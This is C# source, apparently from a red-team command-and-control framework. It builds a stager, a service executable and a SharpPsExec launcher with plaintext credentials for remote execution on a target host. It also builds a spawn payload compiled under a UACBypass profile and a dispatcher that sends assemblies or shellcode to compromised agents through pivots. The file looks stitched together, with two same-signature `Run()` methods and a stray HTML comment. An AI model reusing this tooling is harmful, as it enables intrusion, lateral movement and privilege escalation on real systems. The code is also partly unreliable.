        /// <summary>
        /// Builds the chain of assemblies for a SharpPsExec-based task on the current agent:
        /// a stager compiled from <c>STAGER_TEMPLATE</c>, a service assembly from
        /// <c>SERVICE_TEMPLATE</c> that carries the stager as a serialized <c>TaskMsg</c>, and
        /// a launcher from <c>SHARPSEXEC_TEMPLATE</c> that carries the service plus the
        /// configured credentials. The launcher is handed to <c>RunAssemblyBase64</c>
        /// (the four-argument overload, not the one shown elsewhere in this listing).
        /// </summary>
        /// <remarks>
        /// Returns without any message when a required field is missing, when the selected
        /// profile is unknown, or when <c>agent</c> is null (the stager is still built in that
        /// last case and then discarded).
        /// Reviewer notes: <c>domain</c>, <c>username</c> and <c>password</c> are substituted in
        /// plaintext into the generated source and so end up inside the compiled launcher;
        /// <c>Encoding.Default</c> makes the serialized task depend on the host's ANSI code page;
        /// every <c>new Random()</c> is time-seeded, so names generated within the same tick can
        /// repeat. Placeholder spellings such as "#HOSTANME#" have to match the template files
        /// byte for byte — verify against the templates before changing either side.
        /// </remarks>
        private void Run()
        {
            // NOTE(review): never read or passed on; left in place because this is a doc-only change.
            List <string> args = new List <string>();

            // All of these are instance fields set elsewhere (not visible here). profile is an int
            // key, lport/lpipename are alternatives: exactly one of them must be set.
            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                // Templates live under <cwd>/WORKSPACE_FOLDER/TEMPLATE_FOLDER; the path is relative
                // to the process working directory, not to the executable.
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        // Third argument 40: target framework version passed to the replacer — assumed
                        // to mean .NET 4.0, matching the literal used for BuidStreamAssembly below.
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    // Compile -> gzip -> base64. The random assembly name comes from a time-seeded Random.
                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        // "pippo" is a fixed dummy parameter; the module entry point apparently ignores it.
                        ModuleConfig modconfig = new ModuleConfig
                        {
                            Assembly    = stagerstr,
                            Method      = "Execute",
                            Moduleclass = "RedPeanutRP",
                            Parameters  = new string[] { "pippo" }
                        };

                        TaskMsg task = new TaskMsg
                        {
                            TaskType   = "module",
                            ModuleTask = modconfig,
                            Agentid    = agent.AgentId
                        };

                        // When the agent is reached through another agent, route the task via that pivot.
                        if (agent.Pivoter != null)
                        {
                            task.AgentPivot = agent.Pivoter.AgentId;
                        }

                        //Create Service stream gzip
                        // NOTE(review): Encoding.Default is the system ANSI code page on .NET Framework;
                        // a non-ASCII agent id would serialize differently on different hosts.
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                                 .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        // The service is built as an "exe" (the only call here that passes a kind argument).
                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        // Credentials are embedded in plaintext into the source that gets compiled below;
                        // each optional display/service name falls back to a fresh random string when unset.
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        // Four-argument overload (assembly, type, args, agent) — presumably a wrapper over the
                        // longer RunAssemblyBase64 signature; confirm which overload resolves here.
                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
        /// <summary>
        /// Builds a spawn task for the current agent: a stager assembly compiled from
        /// <c>STAGER_TEMPLATE</c> is wrapped in a <c>TaskMsg</c>, that message is embedded into
        /// <c>SPAWN_TEMPLATE</c> together with the configured <c>process</c> name, and the
        /// resulting assembly is handed to <c>RunAssemblyBase64</c> for the agent. Listener
        /// parameters are taken from the agent itself, or from its pivot when one is set.
        /// </summary>
        /// <remarks>
        /// Any exception — including a failed cast of <c>agent</c> to <c>AgentInstanceHttp</c>,
        /// a missing template file, or a compile failure — is swallowed and reported only by a
        /// one-line console message (which also carries a typo, "Errore"; it is a runtime
        /// string and is left unchanged here). An unknown profile id produces no output at all.
        /// </remarks>
        private void Run()
        {
            try
            {
                // NOTE(review): these four casts run before the pivot check below, so a non-HTTP
                // agent throws here even when a Pivoter is set. All four values are then overwritten
                // in both branches of the if/else, so the initializers are effectively dead.
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    // Pivoted agent: talk to the pivot's IP over a named pipe named after this
                    // agent's id, using the server's default profile. profileid is read through
                    // RedPeanutC2.server here but through Program.GetC2Manager() everywhere else —
                    // presumably the same server instance; verify.
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                // Templates are resolved relative to the process working directory.
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    // An empty pipename means the HTTP listener config; otherwise the pivot config.
                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    // Compile -> gzip -> base64; assembly name from a time-seeded Random.
                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    // "pippo" is a fixed dummy parameter for the module entry point.
                    ModuleConfig modconfig = new ModuleConfig
                    {
                        Assembly    = stagerstr,
                        Method      = "Execute",
                        Moduleclass = "RedPeanutRP",
                        Parameters  = new string[] { "pippo" }
                    };

                    TaskMsg task = new TaskMsg
                    {
                        TaskType   = "module",
                        ModuleTask = modconfig,
                        Agentid    = agent.AgentId
                    };

                    if (agent.Pivoter != null)
                    {
                        task.AgentPivot = agent.Pivoter.AgentId;
                    }

                    // String.Replace with a null replacement removes every occurrence of the
                    // placeholder, so the shellcode/credential slots of the shared template are
                    // blanked here and only #NUTCLR#, #TASK#, #SPAWN# and #PROCESS# are filled.
                    // NOTE(review): Encoding.Default is the host ANSI code page on .NET Framework.
                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                             .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                             .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#SHELLCODE#", null)
                             .Replace("#USERNAME#", null)
                             .Replace("#PASSWORD#", null)
                             .Replace("#DOMAIN#", null)
                             .Replace("#PROCESS#", process);

                    // Compiled with the named compilation profile; the single-space argument is a
                    // placeholder the spawn entry point apparently does not use.
                    string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        spawnprocess,
                        "RedPeanutSpawn",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                // NOTE(review): the exception is discarded, so the operator cannot tell a missing
                // template from a compile error or a bad cast; consider logging it.
                Console.WriteLine("[*] Errore generating task");
            }
        }
<!-- intentionally left for the next block -->
        /// <summary>
        /// Wraps an already base64-encoded assembly into a <c>TaskMsg</c> and sends it to
        /// <paramref name="agent"/>. The task shape depends on <paramref name="tasktype"/>:
        /// "download" builds a <c>FileDownloadConfig</c>, "migrate" a migrate <c>ModuleConfig</c>,
        /// and any other value (including null) a plain module task.
        /// </summary>
        /// <param name="assembly">Base64 assembly to run on the agent.</param>
        /// <param name="method">Entry method name inside <paramref name="type"/>.</param>
        /// <param name="type">Fully qualified class holding the entry method.</param>
        /// <param name="args">Arguments handed to the entry method; copied before use.</param>
        /// <param name="agent">Destination agent; its <c>Pivoter</c>, when set, becomes the task's pivot.</param>
        /// <param name="tasktype">"download", "migrate", or anything else for a module task.</param>
        /// <param name="destfilename">Destination file name; only used by "download".</param>
        /// <param name="instanceid">Task instance id; a random 10-character id is generated when null.</param>
        /// <remarks>
        /// Reviewer notes: the three arms duplicate the Instanceid/AgentPivot handling and could
        /// share a helper; instance ids come from a time-seeded <c>Random</c>, so they are not
        /// unique under load; <c>args.ToArray&lt;string&gt;()</c> on a <c>string[]</c> is only a
        /// defensive copy. No argument validation is performed — a null <paramref name="agent"/>
        /// or <paramref name="args"/> throws <c>NullReferenceException</c> / <c>ArgumentNullException</c>.
        /// </remarks>
        public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null)
        {
            // A null tasktype falls through to default (C# switch on string allows null).
            switch (tasktype)
            {
            case "download":
                FileDownloadConfig downloadconfig = new FileDownloadConfig
                {
                    Assembly     = assembly,
                    Method       = method,
                    Moduleclass  = type,
                    Parameters   = args.ToArray <string>(),
                    FileNameDest = destfilename
                };

                TaskMsg downloadtask = new TaskMsg
                {
                    TaskType     = "download",
                    DownloadTask = downloadconfig,
                    Agentid      = agent.AgentId
                };

                if (instanceid == null)
                {
                    downloadtask.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    downloadtask.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    downloadtask.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(downloadtask);
                break;

            case "migrate":
                ModuleConfig migrateconfig = new ModuleConfig
                {
                    Assembly    = assembly,
                    Method      = method,
                    Moduleclass = type,
                    Parameters  = args.ToArray <string>()
                };

                TaskMsg migratetask = new TaskMsg
                {
                    TaskType   = "migrate",
                    ModuleTask = migrateconfig,
                    Agentid    = agent.AgentId
                };

                if (instanceid == null)
                {
                    migratetask.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    migratetask.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    migratetask.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(migratetask);
                break;

            default:
                ModuleConfig modconfig = new ModuleConfig
                {
                    Assembly    = assembly,
                    Method      = method,
                    Moduleclass = type,
                    Parameters  = args.ToArray <string>()
                };

                // Managed agents receive the assembly as-is; the assignment below merely repeats
                // the initializer. Unmanaged agents get it re-wrapped by Builder.GenerateShellcode
                // (project code, not visible here) and re-encoded.
                if (agent.Managed)
                {
                    modconfig.Assembly = assembly;
                }
                else
                {
                    modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
                                                                                         assembly, RandomAString(10, new Random()) + ".exe", type, method, args)));
                }

                TaskMsg task = new TaskMsg
                {
                    TaskType   = "module",
                    ModuleTask = modconfig,
                    Agentid    = agent.AgentId
                };

                if (instanceid == null)
                {
                    task.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    task.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    task.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(task);
                break;
            }
        }